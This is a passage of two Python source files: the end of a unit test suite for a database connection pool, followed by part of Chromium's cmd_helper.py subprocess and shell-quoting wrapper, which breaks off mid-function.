3) cache = [pool.connection() for i in range(6)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) pool = PooledDB(dbapi, 3, 3) self.assertEqual(len(pool._idle_cache), 3) cache = [pool.connection() for i in range(3)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) cache = [pool.connection() for i in range(6)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) pool = PooledDB(dbapi, 3, 2) self.assertEqual(len(pool._idle_cache), 3) cache = [pool.connection() for i in range(4)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) pool = PooledDB(dbapi, 2, 5) self.assertEqual(len(pool._idle_cache), 2) cache = [pool.connection() for i in range(10)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 5) pool = PooledDB(dbapi, 1, 2, 3) self.assertEqual(len(pool._idle_cache), 1) cache = [pool.connection(False) for i in range(4)] self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 2) cache = [pool.connection() for i in range(10)] self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 3) del cache self.assertEqual(len(pool._idle_cache), 2) if shareable: self.assertEqual(len(pool._shared_cache), 0) pool = PooledDB(dbapi, 1, 3, 2) self.assertEqual(len(pool._idle_cache), 1) cache = [pool.connection(False) for i in range(4)] self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) cache = [pool.connection() for i in range(10)] if shareable: self.assertEqual(len(pool._idle_cache), 1) self.assertEqual(len(pool._shared_cache), 2) else: self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) if shareable: self.assertEqual(len(pool._shared_cache), 0) def test_max_shared(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi) self.assertEqual(len(pool._idle_cache), 0) cache = [pool.connection() for i in range(10)] self.assertEqual(len(cache), 10) self.assertEqual(len(pool._idle_cache), 0) pool = PooledDB(dbapi, 1, 1, 0) self.assertEqual(len(pool._idle_cache), 1) cache = [pool.connection() for i in range(10)] self.assertEqual(len(cache), 10) self.assertEqual(len(pool._idle_cache), 0) pool = PooledDB(dbapi, 0, 0, 1) cache = [pool.connection() for i in range(10)] self.assertEqual(len(cache), 10) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) pool = PooledDB(dbapi, 1, 1, 1) self.assertEqual(len(pool._idle_cache), 1) cache = [pool.connection() for i in range(10)] self.assertEqual(len(cache), 10) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) pool = PooledDB(dbapi, 0, 0, 7) cache = [pool.connection(False) for i in range(3)] self.assertEqual(len(cache), 3) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) cache = [pool.connection() for i in range(10)] self.assertEqual(len(cache), 10) self.assertEqual(len(pool._idle_cache), 3) if shareable: self.assertEqual(len(pool._shared_cache), 7) def test_sort_shared(self): dbapi.threadsafety = 2 pool = PooledDB(dbapi, 0, 4, 4) cache = [] for i in range(6): db = pool.connection() db.cursor().execute('select test') cache.append(db) for i, db in enumerate(cache): self.assertEqual(db._shared_con.shared, 1 if 2 <= i < 4 else 2) cache[2].begin() cache[3].begin() db = pool.connection() self.assertIs(db._con, cache[0]._con) db.close() cache[3].rollback() db = pool.connection() self.assertIs(db._con, cache[3]._con) def test_equally_shared(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi, 5, 5, 5) self.assertEqual(len(pool._idle_cache), 5) for i in range(15): db = pool.connection(False) db.cursor().execute('select test') db.close() self.assertEqual(len(pool._idle_cache), 5) for i in range(5): con = pool._idle_cache[i] self.assertEqual(con._usage, 3) self.assertEqual(con._con.num_queries, 3) cache = [] for i in range(35): db = pool.connection() db.cursor().execute('select test') cache.append(db) del db self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 5) for i in range(5): con = pool._shared_cache[i] self.assertEqual(con.shared, 7) con = con.con self.assertEqual(con._usage, 10) self.assertEqual(con._con.num_queries, 10) del cache self.assertEqual(len(pool._idle_cache), 5) if shareable: self.assertEqual(len(pool._shared_cache), 0) def test_many_shared(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi, 0, 0, 5) cache = [] for i in range(35): db = pool.connection() db.cursor().execute('select test1') db.cursor().execute('select test2') db.cursor().callproc('test3') cache.append(db) del db self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 5) for i in range(5): con = pool._shared_cache[i] self.assertEqual(con.shared, 7) con = con.con self.assertEqual(con._usage, 21) self.assertEqual(con._con.num_queries, 14) cache[3] = cache[8] = cache[33] = None cache[12] = cache[17] = cache[34] = None self.assertEqual(len(pool._shared_cache), 5) self.assertEqual(pool._shared_cache[0].shared, 7) self.assertEqual(pool._shared_cache[1].shared, 7) self.assertEqual(pool._shared_cache[2].shared, 5) self.assertEqual(pool._shared_cache[3].shared, 4) self.assertEqual(pool._shared_cache[4].shared, 6) for db in cache: if db: db.cursor().callproc('test4') for i in range(6): db = pool.connection() db.cursor().callproc('test4') cache.append(db) del db for i in range(5): con = pool._shared_cache[i] self.assertEqual(con.shared, 7) con = con.con self.assertEqual(con._usage, 28) self.assertEqual(con._con.num_queries, 14) del cache if shareable: self.assertEqual(len(pool._idle_cache), 5) self.assertEqual(len(pool._shared_cache), 0) else: self.assertEqual(len(pool._idle_cache), 35) def test_rollback(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety pool = PooledDB(dbapi, 0, 1) self.assertEqual(len(pool._idle_cache), 0) db = pool.connection(False) self.assertEqual(len(pool._idle_cache), 0) self.assertEqual(db._con._con.open_cursors, 0) cursor = db.cursor() self.assertEqual(db._con._con.open_cursors, 1) cursor.execute('set doit1') db.commit() cursor.execute('set dont1') cursor.close() self.assertEqual(db._con._con.open_cursors, 0) del db self.assertEqual(len(pool._idle_cache), 1) db = pool.connection(False) self.assertEqual(len(pool._idle_cache), 0) self.assertEqual(db._con._con.open_cursors, 0) cursor = db.cursor() self.assertEqual(db._con._con.open_cursors, 1) cursor.execute('set doit2') cursor.close() self.assertEqual(db._con._con.open_cursors, 0) db.commit() session = db._con._con.session db.close() self.assertEqual(session, [ 'doit1', 'commit', 'dont1', 'rollback', 'doit2', 'commit', 'rollback']) def test_maxconnections(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi, 1, 2, 2, 3) self.assertTrue(hasattr(pool, '_maxconnections')) self.assertEqual(pool._maxconnections, 3) self.assertTrue(hasattr(pool, '_connections')) self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) cache = [] for i in range(3): cache.append(pool.connection(False)) self.assertEqual(pool._connections, 3) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) self.assertRaises(TooManyConnections, pool.connection, 0) self.assertRaises(TooManyConnections, pool.connection) cache = [] self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 2) if shareable: self.assertEqual(len(pool._shared_cache), 0) for i in range(3): cache.append(pool.connection()) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(pool._connections, 2) self.assertEqual(len(pool._shared_cache), 2) cache.append(pool.connection(False)) self.assertEqual(pool._connections, 3) self.assertEqual(len(pool._shared_cache), 2) else: self.assertEqual(pool._connections, 3) self.assertRaises(TooManyConnections, pool.connection, 0) if shareable: cache.append(pool.connection(True)) self.assertEqual(pool._connections, 3) else: self.assertRaises(TooManyConnections, pool.connection) del cache self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 2) pool = PooledDB(dbapi, 0, 1, 1, 1) self.assertEqual(pool._maxconnections, 1) self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 0) db = pool.connection(False) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) self.assertRaises(TooManyConnections, pool.connection, 0) self.assertRaises(TooManyConnections, pool.connection) del db self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) cache = [pool.connection()] self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) cache.append(pool.connection()) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._shared_cache), 1) self.assertEqual(pool._shared_cache[0].shared, 2) else: self.assertRaises(TooManyConnections, pool.connection) self.assertRaises(TooManyConnections, pool.connection, 0) if shareable: cache.append(pool.connection(True)) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._shared_cache), 1) self.assertEqual(pool._shared_cache[0].shared, 3) else: self.assertRaises(TooManyConnections, pool.connection, 1) del cache self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) db = pool.connection(False) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._idle_cache), 0) del db self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) pool = PooledDB(dbapi, 1, 2, 2, 1) self.assertEqual(pool._maxconnections, 2) self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) cache = [] cache.append(pool.connection(False)) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._idle_cache), 0) cache.append(pool.connection(False)) self.assertEqual(pool._connections, 2) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) self.assertRaises(TooManyConnections, pool.connection, 0) self.assertRaises(TooManyConnections, pool.connection) pool = PooledDB(dbapi, 4, 3, 2, 1, False) self.assertEqual(pool._maxconnections, 4) self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 4) cache = [] for i in range(4): cache.append(pool.connection(False)) self.assertEqual(pool._connections, 4) self.assertEqual(len(pool._idle_cache), 0) self.assertRaises(TooManyConnections, pool.connection, 0) self.assertRaises(TooManyConnections, pool.connection) pool = PooledDB(dbapi, 1, 2, 3, 4, False) self.assertEqual(pool._maxconnections, 4) self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) for i in range(4): cache.append(pool.connection()) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(pool._connections, 3) self.assertEqual(len(pool._shared_cache), 3) cache.append(pool.connection()) self.assertEqual(pool._connections, 3) cache.append(pool.connection(False)) self.assertEqual(pool._connections, 4) else: self.assertEqual(pool._connections, 4) self.assertRaises(TooManyConnections, pool.connection) self.assertRaises(TooManyConnections, pool.connection, 0) pool = PooledDB(dbapi, 0, 0, 3, 3, False) self.assertEqual(pool._maxconnections, 3) self.assertEqual(pool._connections, 0) cache = [] for i in range(3): cache.append(pool.connection(False)) self.assertEqual(pool._connections, 3) self.assertRaises(TooManyConnections, pool.connection, 0) self.assertRaises(TooManyConnections, pool.connection, 1) cache = [] self.assertEqual(pool._connections, 0) for i in range(3): cache.append(pool.connection()) self.assertEqual(pool._connections, 3) if shareable: for i in range(3): cache.append(pool.connection()) self.assertEqual(pool._connections, 3) else: self.assertRaises(TooManyConnections, pool.connection) self.assertRaises(TooManyConnections, pool.connection, 0) pool = PooledDB(dbapi, 0, 0, 3) self.assertEqual(pool._maxconnections, 0) self.assertEqual(pool._connections, 0) cache = [] for i in range(10): cache.append(pool.connection(False)) cache.append(pool.connection()) if shareable: self.assertEqual(pool._connections, 13) self.assertEqual(len(pool._shared_cache), 3) else: self.assertEqual(pool._connections, 20) pool = PooledDB(dbapi, 1, 1, 1, 1, True) self.assertEqual(pool._maxconnections, 1) self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) db = pool.connection(False) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._idle_cache), 0) def connection(): db = pool.connection() cursor = db.cursor() cursor.execute('set thread') cursor.close() db.close() from threading import Thread thread = Thread(target=connection) thread.start() thread.join(0.1) self.assertTrue(thread.is_alive()) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) session = db._con._con.session self.assertEqual(session, ['rollback']) del db thread.join(0.1) self.assertFalse(thread.is_alive()) self.assertEqual(pool._connections, 0) self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) db = pool.connection(False) self.assertEqual(pool._connections, 1) self.assertEqual(len(pool._idle_cache), 0) self.assertEqual( session, ['rollback', 'rollback', 'thread', 'rollback']) del db def test_maxusage(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety for maxusage in (0, 3, 7): pool = PooledDB(dbapi, 0, 0, 0, 1, False, maxusage) self.assertEqual(pool._maxusage, maxusage) self.assertEqual(len(pool._idle_cache), 0) db = pool.connection(False) self.assertEqual(db._con._maxusage, maxusage) self.assertEqual(len(pool._idle_cache), 0) self.assertEqual(db._con._con.open_cursors, 0) self.assertEqual(db._usage, 0) self.assertEqual(db._con._con.num_uses, 0) self.assertEqual(db._con._con.num_queries, 0) for i in range(20): cursor = db.cursor() self.assertEqual(db._con._con.open_cursors, 1) cursor.execute('select test%i' % i) r = cursor.fetchone() self.assertEqual(r, 'test%i' % i) cursor.close() self.assertEqual(db._con._con.open_cursors, 0) if maxusage: j = i % maxusage + 1 else: j = i + 1 self.assertEqual(db._usage, j) self.assertEqual(db._con._con.num_uses, j) self.assertEqual(db._con._con.num_queries, j) db.cursor().callproc('test') self.assertEqual(db._con._con.open_cursors, 0) self.assertEqual(db._usage, j + 1) self.assertEqual(db._con._con.num_uses, j + 1) self.assertEqual(db._con._con.num_queries, j) def test_setsession(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety setsession = ('set time zone', 'set datestyle') pool = PooledDB(dbapi, 0, 0, 0, 1, False, None, setsession) self.assertEqual(pool._setsession, setsession) db = pool.connection(False) self.assertEqual(db._setsession_sql, setsession) self.assertEqual( db._con._con.session, ['time zone', 'datestyle']) db.cursor().execute('select test') db.cursor().execute('set test1') self.assertEqual(db._usage, 2) self.assertEqual(db._con._con.num_uses, 4) self.assertEqual(db._con._con.num_queries, 1) self.assertEqual( db._con._con.session, ['time zone', 'datestyle', 'test1']) db.close() db = pool.connection(False) self.assertEqual(db._setsession_sql, setsession) self.assertEqual( db._con._con.session, ['time zone', 'datestyle', 'test1', 'rollback']) db._con._con.close() db.cursor().execute('select test') db.cursor().execute('set test2') self.assertEqual( db._con._con.session, ['time zone', 'datestyle', 'test2']) def test_one_thread_two_connections(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi, 2) db1 = pool.connection() for i in range(5): db1.cursor().execute('select test') db2 = pool.connection() self.assertNotEqual(db1, db2) self.assertNotEqual(db1._con, db2._con) for i in range(7): db2.cursor().execute('select test') self.assertEqual(db1._con._con.num_queries, 5) self.assertEqual(db2._con._con.num_queries, 7) del db1 db1 = pool.connection() self.assertNotEqual(db1, db2) self.assertNotEqual(db1._con, db2._con) for i in range(3): db1.cursor().execute('select test') self.assertEqual(db1._con._con.num_queries, 8) db2.cursor().execute('select test') self.assertEqual(db2._con._con.num_queries, 8) pool = PooledDB(dbapi, 0, 0, 2) db1 = pool.connection() for i in range(5): db1.cursor().execute('select test') db2 = pool.connection() self.assertNotEqual(db1, db2) self.assertNotEqual(db1._con, db2._con) for i in range(7): db2.cursor().execute('select test') self.assertEqual(db1._con._con.num_queries, 5) self.assertEqual(db2._con._con.num_queries, 7) del db1 db1 = pool.connection() self.assertNotEqual(db1, db2) self.assertNotEqual(db1._con, db2._con) for i in range(3): db1.cursor().execute('select test') self.assertEqual(db1._con._con.num_queries, 8) db2.cursor().execute('select test') self.assertEqual(db2._con._con.num_queries, 8) pool = PooledDB(dbapi, 0, 0, 1) db1 = pool.connection() db2 = pool.connection() self.assertNotEqual(db1, db2) if shareable: self.assertEqual(db1._con, db2._con) else: self.assertNotEqual(db1._con, db2._con) del db1 db1 = pool.connection(False) self.assertNotEqual(db1, db2) self.assertNotEqual(db1._con, db2._con) def test_tnree_threads_two_connections(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety pool = PooledDB(dbapi, 2, 2, 0, 2, True) try: from queue import Queue, Empty except ImportError: # Python 2 from Queue import Queue, Empty queue = Queue(3) def connection(): try: queue.put(pool.connection(), 1, 1) except Exception: queue.put(pool.connection(), 1) from threading import Thread for i in range(3): Thread(target=connection).start() try: db1 = queue.get(1, 1) db2 = queue.get(1, 1) except TypeError: db1 = queue.get(1) db2 = queue.get(1) self.assertNotEqual(db1, db2) db1_con = db1._con db2_con = db2._con self.assertNotEqual(db1_con, db2_con) try: self.assertRaises(Empty, queue.get, 1, 0.1) except TypeError: self.assertRaises(Empty, queue.get, 0) del db1 try: db1 = queue.get(1, 1) except TypeError: db1 = queue.get(1) self.assertNotEqual(db1, db2) self.assertNotEqual(db1._con, db2._con) self.assertEqual(db1._con, db1_con) pool = PooledDB(dbapi, 2, 2, 1, 2, True) db1 = pool.connection(False) db2 = pool.connection(False) self.assertNotEqual(db1, db2) db1_con = db1._con db2_con = db2._con self.assertNotEqual(db1_con, db2_con) Thread(target=connection).start() try: self.assertRaises(Empty, queue.get, 1, 0.1) except TypeError: self.assertRaises(Empty, queue.get, 0) del db1 try: db1 = queue.get(1, 1) except TypeError: db1 = queue.get(1) self.assertNotEqual(db1, db2) self.assertNotEqual(db1._con, db2._con) self.assertEqual(db1._con, db1_con) def test_ping_check(self): Connection = dbapi.Connection Connection.has_ping = True Connection.num_pings = 0 dbapi.threadsafety = 2 pool = PooledDB(dbapi, 1, 1, 0, 0, False, None, None, True, None, 0) db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 0) db._con.close() db.close() db = pool.connection() self.assertFalse(db._con._con.valid) self.assertEqual(Connection.num_pings, 0) pool = PooledDB(dbapi, 1, 1, 1, 0, False, None, None, True, None, 0) db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 0) db._con.close() db = pool.connection() self.assertFalse(db._con._con.valid) self.assertEqual(Connection.num_pings, 0) pool = PooledDB(dbapi, 1, 1, 0, 0, False, None, None, True, None, 1) db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 1) db._con.close() db.close() db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 2) pool = PooledDB(dbapi, 1, 1, 1, 0, False, None, None, True, None, 1) db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 3) db._con.close() db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 4) pool = PooledDB(dbapi, 1, 1, 1, 0, False, None, None, True, None, 2) db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 4) db._con.close() db = pool.connection() self.assertFalse(db._con._con.valid) self.assertEqual(Connection.num_pings, 4) db.cursor() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 5) pool = PooledDB(dbapi, 1, 1, 1, 0, False, None, None, True, None, 4) db = pool.connection() self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 5) db._con.close() db = pool.connection() self.assertFalse(db._con._con.valid) self.assertEqual(Connection.num_pings, 5) cursor = db.cursor() db._con.close() self.assertFalse(db._con._con.valid) self.assertEqual(Connection.num_pings, 5) cursor.execute('select test') self.assertTrue(db._con._con.valid) self.assertEqual(Connection.num_pings, 6) Connection.has_ping = False Connection.num_pings = 0 def test_failed_transaction(self): dbapi.threadsafety = 2 pool = PooledDB(dbapi, 0, 1, 1) db = pool.connection() cursor = db.cursor() db._con._con.close() cursor.execute('select test') db.begin() db._con._con.close() self.assertRaises(dbapi.InternalError, cursor.execute, 'select test') cursor.execute('select test') db.begin() db.cancel() db._con._con.close() cursor.execute('select test') pool = PooledDB(dbapi, 1, 1, 0) db = pool.connection() cursor = db.cursor() db._con._con.close() cursor.execute('select test') db.begin() db._con._con.close() self.assertRaises(dbapi.InternalError, cursor.execute, 'select test') cursor.execute('select test') db.begin() db.cancel() db._con._con.close() cursor.execute('select test') def test_shared_in_transaction(self): dbapi.threadsafety = 2 pool = PooledDB(dbapi, 0, 1, 1) db = pool.connection() db.begin() pool.connection(False) self.assertRaises(TooManyConnections, pool.connection) pool = PooledDB(dbapi, 0, 2, 2) db1 = pool.connection() db2 = pool.connection() self.assertIsNot(db2._con, db1._con) db2.close() db2 = pool.connection() self.assertIsNot(db2._con, db1._con) db = pool.connection() self.assertIs(db._con, db1._con) db.close() db1.begin() db = pool.connection() self.assertIs(db._con, db2._con) db.close() db2.begin() pool.connection(False) self.assertRaises(TooManyConnections, pool.connection) db1.rollback() db = pool.connection() self.assertIs(db._con, db1._con) def test_reset_transaction(self): pool = PooledDB(dbapi, 1, 1, 0) db = pool.connection() db.begin() con = db._con self.assertTrue(con._transaction) self.assertEqual(con._con.session, ['rollback']) db.close() self.assertIs(pool.connection()._con, con) self.assertFalse(con._transaction) self.assertEqual(con._con.session, ['rollback'] * 3) pool = PooledDB(dbapi, 1, 1, 0, reset=False) db = pool.connection() db.begin() con = db._con self.assertTrue(con._transaction) self.assertEqual(con._con.session, []) db.close() self.assertIs(pool.connection()._con, con) self.assertFalse(con._transaction) self.assertEqual(con._con.session, ['rollback']) class TestSharedDBConnection(unittest.TestCase): def test_create_connection(self): db_con = dbapi.connect() con = SharedDBConnection(db_con) self.assertEqual(con.con, db_con) self.assertEqual(con.shared, 1) def test_share_and_unshare(self): con = SharedDBConnection(dbapi.connect()) self.assertEqual(con.shared, 1) con.share() self.assertEqual(con.shared, 2) con.share() self.assertEqual(con.shared, 3) con.unshare() self.assertEqual(con.shared, 2) con.unshare() self.assertEqual(con.shared, 1) def test_comparison(self): con1 = SharedDBConnection(dbapi.connect()) con1.con._transaction = False con2 = SharedDBConnection(dbapi.connect()) con2.con._transaction = False self.assertTrue(con1 == con2) self.assertTrue(con1 <= con2) self.assertTrue(con1 >= con2) self.assertFalse(con1 != con2) self.assertFalse(con1 < con2) self.assertFalse(con1 > con2) con2.share() self.assertFalse(con1 == con2) self.assertTrue(con1 <= con2) self.assertFalse(con1 >= con2) self.assertTrue(con1 != con2) self.assertTrue(con1 < con2) self.assertFalse(con1 > con2) con1.con._transaction = True self.assertFalse(con1 == con2) self.assertFalse(con1 <= con2) self.assertTrue(con1 >= con2) self.assertTrue(con1 != con2) self.assertFalse(con1 < con2) self.assertTrue(con1 > con2) if __name__ == '__main__': unittest.main()
cmd_helper.py
# Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """A wrapper for subprocess to make calling shell commands easier.""" import logging import os import pipes import select import signal import string import StringIO import subprocess import sys import time logger = logging.getLogger(__name__) _SafeShellChars = frozenset(string.ascii_letters + string.digits + '@%_-+=:,./') def SingleQuote(s): """Return an shell-escaped version of the string using single quotes. Reliably quote a string which may contain unsafe characters (e.g. space, quote, or other special characters such as '$'). The returned value can be used in a shell command line as one token that gets to be interpreted literally. Args: s: The string to quote. Return: The string quoted using single quotes. """ return pipes.quote(s) def DoubleQuote(s): """Return an shell-escaped version of the string using double quotes. Reliably quote a string which may contain unsafe characters (e.g. space or quote characters), while retaining some shell features such as variable interpolation. The returned value can be used in a shell command line as one token that gets to be further interpreted by the shell. The set of characters that retain their special meaning may depend on the shell implementation. This set usually includes: '$', '`', '\', '!', '*', and '@'. Args: s: The string to quote. Return: The string quoted using double quotes. """ if not s: return '""' elif all(c in _SafeShellChars for c in s): return s else: return '"' + s.replace('"', '\\"') + '"' def ShrinkToSnippet(cmd_parts, var_name, var_value): """Constructs a shell snippet for a command using a variable to shrink it. Takes into account all quoting that needs to happen. Args: cmd_parts: A list of command arguments. var_name: The variable that holds var_value. var_value: The string to replace in cmd_parts with $var_name Returns: A shell snippet that does not include setting the variable. """ def shrink(value): parts = (x and SingleQuote(x) for x in value.split(var_value)) with_substitutions = ('"$%s"' % var_name).join(parts) return with_substitutions or "''" return ' '.join(shrink(part) for part in cmd_parts) def Popen(args, stdout=None, stderr=None, shell=None, cwd=None, env=None): # preexec_fn isn't supported on windows. if sys.platform == 'win32': close_fds = (stdout is None and stderr is None) preexec_fn = None else: close_fds = True preexec_fn = lambda: signal.signal(signal.SIGPIPE, signal.SIG_DFL) return subprocess.Popen( args=args, cwd=cwd, stdout=stdout, stderr=stderr, shell=shell, close_fds=close_fds, env=env, preexec_fn=preexec_fn) def Call(args, stdout=None, stderr=None, shell=None, cwd=None, env=None): pipe = Popen(args, stdout=stdout, stderr=stderr, shell=shell, cwd=cwd, env=env) pipe.communicate() return pipe.wait() def RunCmd(args, cwd=None): """Opens a subprocess to execute a program and returns its return value. Args: args: A string or a sequence of program arguments. The program to execute is the string or the first item in the args sequence. cwd: If not None, the subprocess's current directory will be changed to |cwd| before it's executed. Returns: Return code from the command execution. """ logger.info(str(args) + ' ' + (cwd or '')) return Call(args, cwd=cwd) def GetCmdOutput(args, cwd=None, shell=False, env=None): """Open a subprocess to execute a program and returns its output. Args: args: A string or a sequence of program arguments. The program to execute is the string or the first item in the args sequence. cwd: If not None, the subprocess's current directory will be changed to |cwd| before it's executed. shell: Whether to execute args as a shell command. env: If not None, a mapping that defines environment variables for the subprocess. Returns: Captures and returns the command's stdout. Prints the command's stderr to logger (which defaults to stdout). """ (_, output) = GetCmdStatusAndOutput(args, cwd, shell, env) return output def _ValidateAndLogCommand(args, cwd, shell): if isinstance(args, basestring): if not shell: raise Exception('string args must be run with shell=True') else: if shell: raise Exception('array args must be run with shell=False') args = ' '.join(SingleQuote(c) for c in args) if cwd is None: cwd = '' else: cwd = ':' + cwd logger.info('[host]%s> %s', cwd, args) return args def GetCmdStatusAndOutput(args, cwd=None, shell=False, env=None): """Executes a subprocess and returns its exit code and output. Args: args: A string or a sequence of program arguments. The program to execute is the string or the first item in the args sequence. cwd: If not None, the subprocess's current directory will be changed to |cwd| before it's executed. shell: Whether to execute args as a shell command. Must be True if args is a string and False if args is a sequence. env: If not None, a mapping that defines environment variables for the subprocess. Returns: The 2-tuple (exit code, stdout). """ status, stdout, stderr = GetCmdStatusOutputAndError( args, cwd=cwd, shell=shell, env=env) if stderr: logger.critical('STDERR: %s', stderr) logger.debug('STDOUT: %s%s', stdout[:4096].rstrip(), '<truncated>' if len(stdout) > 4096 else '') return (status, stdout) def StartCmd(args, cwd=None, shell=False, env=None): """Starts a subprocess and returns a handle to the process. Args: args: A string or a sequence of program arguments. The program to execute is the string or the first item in the args sequence. cwd: If not None, the subprocess's current directory will be changed to |cwd| before it's executed. shell: Whether to execute args as a shell command. Must be True if args is a string and False if args is a sequence. env: If not None, a mapping that defines environment variables for the subprocess. Returns: A process handle from subprocess.Popen. """ _ValidateAndLogCommand(args, cwd, shell) return Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=shell, cwd=cwd, env=env) def GetCmdStatusOutputAndError(args, cwd=None, shell=False, env=None): """Executes a subprocess and returns its exit code, output, and errors. Args: args: A string or a sequence of program arguments. The program to execute is the string or the first item in the args sequence. cwd: If not None, the subprocess's current directory will be changed to |cwd| before it's executed. shell: Whether to execute args as a shell command. Must be True if args is a string and False if args is a sequence. env: If not None, a mapping that defines environment variables for the subprocess. Returns: The 3-tuple (exit code, stdout, stderr). """ _ValidateAndLogCommand(args, cwd, shell) pipe = Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=shell, cwd=cwd, env=env) stdout, stderr = pipe.communicate() return (pipe.returncode, stdout, stderr) class TimeoutError(Exception): """Module-specific timeout exception.""" def __init__(self, output=None): super(TimeoutError, self).__init__() self._output = output @property def output(self): return self._output def _IterProcessStdoutFcntl( process, iter_timeout=None, timeout=None, buffer_size=4096, poll_interval=1): """An fcntl-based implementation of _IterProcessStdout.""" # pylint: disable=too-many-nested-blocks import fcntl try: # Enable non-blocking reads from the child's stdout. child_fd = process.stdout.fileno() fl = fcntl.fcntl(child_fd, fcntl.F_GETFL) fcntl.fcntl(child_fd, fcntl.F_SETFL, fl | os.O_NONBLOCK) end_time = (time.time() + timeout) if timeout else None iter_end_time = (time.time() + iter_timeout) if iter_timeout else None while True: if end_time and time.time() > end_time: raise TimeoutError() if iter_end_time and time.time() > iter_end_time: yield None iter_end_time = time.time() + iter_timeout if iter_end_time: iter_aware_poll_interval = min( poll_interval, max(0, iter_end_time - time.time())) else: iter_aware_poll_interval = poll_interval read_fds, _, _ = select.select( [child_fd], [], [], iter_aware_poll_interval) if child_fd in read_fds: data = os.read(child_fd, buffer_size) if not data: break yield data if process.poll() is not None: # If process is closed, keep checking for output data (because of timing # issues). while True: read_fds, _, _ = select.select( [child_fd], [], [], iter_aware_poll_interval) if child_fd in read_fds: data = os.read(child_fd, buffer_size) if data: yield data continue break break finally: try: if process.returncode is None: # Make sure the process doesn't stick around if we fail with an # exception. process.kill() except OSError: pass process.wait() def _IterProcessStdoutQueue( process, iter_timeout=None, timeout=None, buffer_size=4096, poll_interval=1): """A Queue.Queue-based implementation of _IterProcessStdout. TODO(jbudorick): Evaluate whether this is a suitable replacement for _IterProcessStdoutFcntl on all platforms. """ # pylint: disable=unused-argument import Queue import threading stdout_queue = 